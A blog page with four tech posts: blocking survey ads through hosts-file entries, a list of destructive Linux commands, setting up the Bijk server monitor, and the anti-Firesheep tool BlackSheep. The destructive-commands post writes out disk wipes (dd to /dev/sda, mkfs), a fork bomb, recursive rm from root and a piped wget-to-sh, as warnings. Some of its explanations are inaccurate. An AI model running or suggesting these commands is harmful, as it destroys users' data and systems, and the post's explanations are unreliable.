UrFix's Blog

A geek without a cause

Designed with WordPress

  • How To Skip/Block/Bypass: Annoying Survey Ads from Webfetti

    by

    I’m sure that by now you’ve seen these ads online:

    To watch this episode online for free, please complete one of these surveys to gain *life-time* access to our complete network

    • Hot Alice in Wonderland Graphics
    • Get Hot NEW Twilight Graphics

    They can be really annoying at times. Let’s say you are gullible enough to try one of these surveys you’ll just be forced to download some stupid spyware toolbar by Webfetti.

    You won’t even get a chance to view the original page you came from.

    Well here is a quick fix you might not have thought about. It involves changing the hosts file, thus tricking your browser into thinking these ads will come from 127.0.0.1 (localhost).

    If you are using Linux fire up your terminal and run

    sudo nano /etc/hosts

    paste in

    127.0.0.1 webmasterbond.com
    127.0.0.1 tracking101.com
    127.0.0.1 publish.webmasterbond.com
    127.0.0.1 www.cpalead.com
    127.0.0.1 smowtion.com
    127.0.0.1 ads.smowtion.com

    ALSO NOTE: This can be done with just about any ad. Just view the source code to the page you are trying to look at, find the ad site provider and add them to the list as well.

    Save and exit the terminal.
    If you have your browser open clean out your cache or just close it and reopen it.
    go back to the original site and there you have it no more annoying ads

    If you are a Microsoft Windows user, you will have to add the above to a file called hosts which can be found in \windows\system32\drivers\etc\ directory

    There you go that simple, no need to download any browser plugins, or software.

  • Run These Linux Commands And You Will Die

    by

    Many Linux newbies love to copy and paste every command they see on the net, curious to find out what they do. Running these following commands won’t kill you, but you’ll wish you were dead. Linux gives full control over the system if you are logged in as root user, running anyone of the following commands without clear understanding of them would lead to a disaster situation.

    dd if=/dev/zero of=/dev/sda formats hard disk back to the factory settings. mkfs.ext3 /dev/sda will format all data from the device specified after the mkfs command. mv ~ /dev/null will erase everything from your root directory.  Basically /dev/null does not exists and anything written to it is actually discarded from the system. dd if=/dev/random of=/dev/port run this command if you are eager to freeze your Linux system. :(){:|:&};: is a forkbomb command, once you run it, it will let you system freeze and you will have no other way except to have it hard reboot ( Please don't run this command if you are feeling curiosity, consequences can be bitter ) rsync -r –delete /home/backup such commands has a delete switch  that can be used to destroy parts of the file system. shutdown -h now shuts your system down and you will have to hard reboot it, don't run this command if you are hosting your servers in any data center or colocation. run shutdown -r now instead. any_command> / dev / sda This command causes total loss of data, in the partition that is mentioned in command http://some_untrusted_source wget-O-| sh Never download untrusted sources and below are implemented, they may be malicious codes find ./ * -exec rm {} \; This removes every file from the current directory on. find . / * -exec rm {} \; This also removes removes every file from the current directory plus every file from the root directory forward! Conclusion I'm sure that are other equally deadly Linux commands that I failed to include here, so if you have something to add, please share it with us via comment.

  • How To Monitor Linux Server: SMS Alerts-Performance Graphs

    by

    I will show you a way to monitor your Linux server with a tool from Bijk – with email and SMS alerts. Bijk is an open source application, for creating live graphs and alerts, that monitors your server performance. With the Basic version of Bijk, you can easily set up email alerts for monitoring almost everything on your server (system overload, disk space usage, Apache troubles, MySQL, etc.).

    To install Bijk on your Linux server, go to the page http://www.bijk.com, sign up, download and add it to your server in a few easy steps.

    You can try the Online Demo first.

    Bijk is ready for Debian, Ubuntu, CentOS and RedHat and you need only about three minutes to install Bijk on a server.

    1. Log into your server via SSH as user root:

    ssh root@myserver

    2. Add Key:

    wget http://apt.bijk.com/archive-key.asc  -O - | apt-key add -

    3. Add new repository with bijk-node (choose your version)

    echo 'deb http://apt.bijk.com/ubuntu  lucid main' >/etc/apt/sources.list.d/bijk.list
    echo 'deb http://apt.bijk.com/ubuntu  karmic main' >/etc/apt/sources.list.d/bijk.list
    echo 'deb http://apt.bijk.com/ubuntu  jaunty main' >/etc/apt/sources.list.d/bijk.list
    echo 'deb http://apt.bijk.com/ubuntu  interpid main' >/etc/apt/sources.list.d/bijk.list
    echo 'deb http://apt.bijk.com/ubuntu  hardy main' >/etc/apt/sources.list.d/bijk.list

    4. Install bijk-node package:

    aptitude update
    aptitude install bijk-node

    5. Get client hash:

    1) Go to the alerts set-up page and find the function you want to monitor.

    2) Choose the email or SMS where you want to receive the alert.

    3) Bijk automatically chooses the critical range to monitor so you only change this if you wish.

    That’s all! It cannot be more easy.

  • BlackSheep Alerts You When Networking-Sniffing Tool Firesheep Is After Your Passwords

    by

    Last month we heard about  Firesheep, a new Firefox extension designed to sniff out weak security and hijack web site credentials on open Wi-Fi networks. BlackSheep is an anti-Firesheep tool, designed to alert you whenever Firesheep is active on your local network.

    Zscaler, a company specializing in security measures for cloud-based computing services, created Blacksheep to counteract Firesheep session hijacking. Once installed Blacksheep broadcasts fake credentials to essentially fish for Firesheep installations on the network.

    When one is detected it displays the alert seen in the screen capture above. The configuration of Blacksheep is dead simple; by default it goes fishing every 5 minutes but you can adjust it down to 1 minute.

    Zscaler

    At the Toorcon 12 security conference, Eric Butler released a Firefox plugin named Firesheep, which drew significant media attention. Firesheep allowed any user to seamlessly hijack the web session of another user on the same local network. Although such attacks are not new, the ease of use presented by Firesheep brought session hijacking to the masses.
    BlackSheep, also a Firefox plugin is designed to combat Firesheep. BlackSheep does this by dropping ‘fake’ session ID information on the wire and then monitors traffic to see if it has been hijacked. While Firesheep is largely passive, once it identifies session information for a targeted domain, it then makes a subsequent request to that same domain, using the hijacked session information in order to obtain the name of the hijacked user along with an image of the person, if available. It is this request that BlackSheep identifies in order to detect the presence of Firesheep on the network. When identified, the user will be receive the following warning message:
    It should be noted that Firesheep and BlackSheep cannot be installed on the same Firefox instance as they share much of the same code base. If you want to run both Firesheep and BlackSheep on the same machine, they should be installed in separate Firefox profiles.
    The Problem
    Session hijacking is nothing new. Web sites typically use SSL connections for initial login pages, but revert to non-encrypted traffic for all subsequent communication. As such, while a user’s username and password may be protected, once they are authenticated, any user on the same network can simply sniff network traffic, obtain a user’s session ID and then hijack their session for a given website. Although this has always been a serious risk, especially on insecure networks such as public wifi hot spots, some degree of technical knowledge was required to accomplish the attack. Firesheep, opens such attacks to the masses as it turns session hijacking into a point and click exercise. Unless websites mandate SSL for all traffic on the site, session hijacking will always remain a threat. Fortunately, BlackSheep can be used to let you know if someone is running Firesheep on the same network.
    Configuration
    BlackSheep options can be accessed by navigating to Tools > Add-ons within Firefox. Once there, under the Extensions tab, select the Preferences button for BlackSheep.
    Check Interval: BlackSheep will continually drop fake session information onto the wire and then listen for another IP address re-submitting this same information, as this will indicate the presence of Firesheep on the network. The Check Interval identifies the number of minutes between checks.
    Interface: Allows the user to configure the network interface that BlackSheep should listen on.

    Blacksheep is a free tool and works wherever Firefox does. Go Download It Now!

Chat

Hi 👋, how can we help?